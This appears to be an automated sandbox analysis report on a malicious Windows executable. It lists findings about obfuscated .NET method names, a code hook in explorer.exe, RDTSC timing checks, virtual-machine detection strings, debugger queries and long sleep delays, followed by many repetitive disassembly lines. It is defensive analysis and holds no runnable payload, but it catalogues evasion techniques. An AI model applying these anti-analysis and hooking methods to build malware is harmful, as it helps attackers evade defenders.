                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, NEVdnhvnVgEaSNcLx9.csHigh entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, SALVIvcA2ajS2o3C0N.csHigh entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'

                Hooking and other Techniques for Hiding and Protection

                Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process information set: NOOPENFILEERRORBOX (36 occurrences)
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)
                Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTR
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000002939904 second address: 000000000293990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000002939B7E second address: 0000000002939B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: A40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 26C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 24A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 5D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 6D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 6E80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: 7E80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_00409AB0 rdtsc (2_2_00409AB0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3326
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 6623
                Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 880
                Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 866
                Source: C:\Windows\SysWOW64\help.exe | Window / User API: threadDelayed 2551
                Source: C:\Windows\SysWOW64\help.exe | Window / User API: threadDelayed 7421
                Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_3-13817)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | API coverage: 1.7 %
                Source: C:\Windows\SysWOW64\help.exe | API coverage: 1.8 %
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe TID: 7572 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\explorer.exe TID: 8084 | Thread sleep count: 3326 > 30
                Source: C:\Windows\explorer.exe TID: 8084 | Thread sleep time: -6652000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 8084 | Thread sleep count: 6623 > 30
                Source: C:\Windows\explorer.exe TID: 8084 | Thread sleep time: -13246000s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe TID: 7796 | Thread sleep count: 2551 > 30
                Source: C:\Windows\SysWOW64\help.exe TID: 7796 | Thread sleep time: -5102000s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe TID: 7796 | Thread sleep count: 7421 > 30
                Source: C:\Windows\SysWOW64\help.exe TID: 7796 | Thread sleep time: -14842000s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Thread delayed: delay time: 922337203685477
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000003.00000003.2284258372.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00=
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000003.00000003.2284258372.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\help.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_00409AB0 rdtsc (2_2_00409AB0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0040ACF0 LdrLoadDll (2_2_0040ACF0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h] (2_2_019EA197)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h] (2_2_019EA197)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h] (2_2_019EA197)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AAC188 mov eax, dword ptr fs:[00000030h] (2_2_01AAC188)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AAC188 mov eax, dword ptr fs:[00000030h] (2_2_01AAC188)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A30185 mov eax, dword ptr fs:[00000030h] (2_2_01A30185)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A94180 mov eax, dword ptr fs:[00000030h] (2_2_01A94180)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A94180 mov eax, dword ptr fs:[00000030h] (2_2_01A94180)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h] (2_2_01A7019F)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h] (2_2_01A7019F)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h] (2_2_01A7019F)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h] (2_2_01A7019F)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AC61E5 mov eax, dword ptr fs:[00000030h] (2_2_01AC61E5)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A201F8 mov eax, dword ptr fs:[00000030h] (2_2_01A201F8)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AB61C3 mov eax, dword ptr fs:[00000030h] (2_2_01AB61C3)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AB61C3 mov eax, dword ptr fs:[00000030h] (2_2_01AB61C3)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h] (2_2_01A6E1D0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h] (2_2_01A6E1D0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A6E1D0 mov ecx, dword ptr fs:[00000030h] (2_2_01A6E1D0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h] (2_2_01A6E1D0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h] (2_2_01A6E1D0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A20124 mov eax, dword ptr fs:[00000030h] (2_2_01A20124)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h] (2_2_01A9E10E)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9A118 mov ecx, dword ptr fs:[00000030h] (2_2_01A9A118)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h] (2_2_01A9A118)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h] (2_2_01A9A118)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h] (2_2_01A9A118)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AB0115 mov eax, dword ptr fs:[00000030h] (2_2_01AB0115)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019EC156 mov eax, dword ptr fs:[00000030h] (2_2_019EC156)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019F6154 mov eax, dword ptr fs:[00000030h] (2_2_019F6154)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019F6154 mov eax, dword ptr fs:[00000030h] (2_2_019F6154)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h] (2_2_01A84144)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h] (2_2_01A84144)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A84144 mov ecx, dword ptr fs:[00000030h] (2_2_01A84144)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h] (2_2_01A84144)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h] (2_2_01A84144)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A88158 mov eax, dword ptr fs:[00000030h] (2_2_01A88158)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A880A8 mov eax, dword ptr fs:[00000030h] (2_2_01A880A8)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AB60B8 mov eax, dword ptr fs:[00000030h] (2_2_01AB60B8)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01AB60B8 mov ecx, dword ptr fs:[00000030h] (2_2_01AB60B8)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019F208A mov eax, dword ptr fs:[00000030h] (2_2_019F208A)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A760E0 mov eax, dword ptr fs:[00000030h] (2_2_01A760E0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A320F0 mov ecx, dword ptr fs:[00000030h] (2_2_01A320F0)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC0F0 mov eax, dword ptr fs:[00000030h]2_2_019EC0F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F80E9 mov eax, dword ptr fs:[00000030h]2_2_019F80E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A720DE mov eax, dword ptr fs:[00000030h]2_2_01A720DE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_019EA0E3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86030 mov eax, dword ptr fs:[00000030h]2_2_01A86030
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A74000 mov ecx, dword ptr fs:[00000030h]2_2_01A74000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA020 mov eax, dword ptr fs:[00000030h]2_2_019EA020
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC020 mov eax, dword ptr fs:[00000030h]2_2_019EC020
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2050 mov eax, dword ptr fs:[00000030h]2_2_019F2050
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1C073 mov eax, dword ptr fs:[00000030h]2_2_01A1C073
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76050 mov eax, dword ptr fs:[00000030h]2_2_01A76050
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1438F mov eax, dword ptr fs:[00000030h]2_2_01A1438F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1438F mov eax, dword ptr fs:[00000030h]2_2_01A1438F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A263FF mov eax, dword ptr fs:[00000030h]2_2_01A263FF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAC3CD mov eax, dword ptr fs:[00000030h]2_2_01AAC3CD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A763C0 mov eax, dword ptr fs:[00000030h]2_2_01A763C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov ecx, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A943D4 mov eax, dword ptr fs:[00000030h]2_2_01A943D4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A943D4 mov eax, dword ptr fs:[00000030h]2_2_01A943D4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC310 mov ecx, dword ptr fs:[00000030h]2_2_019EC310
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10310 mov ecx, dword ptr fs:[00000030h]2_2_01A10310
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9437C mov eax, dword ptr fs:[00000030h]2_2_01A9437C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
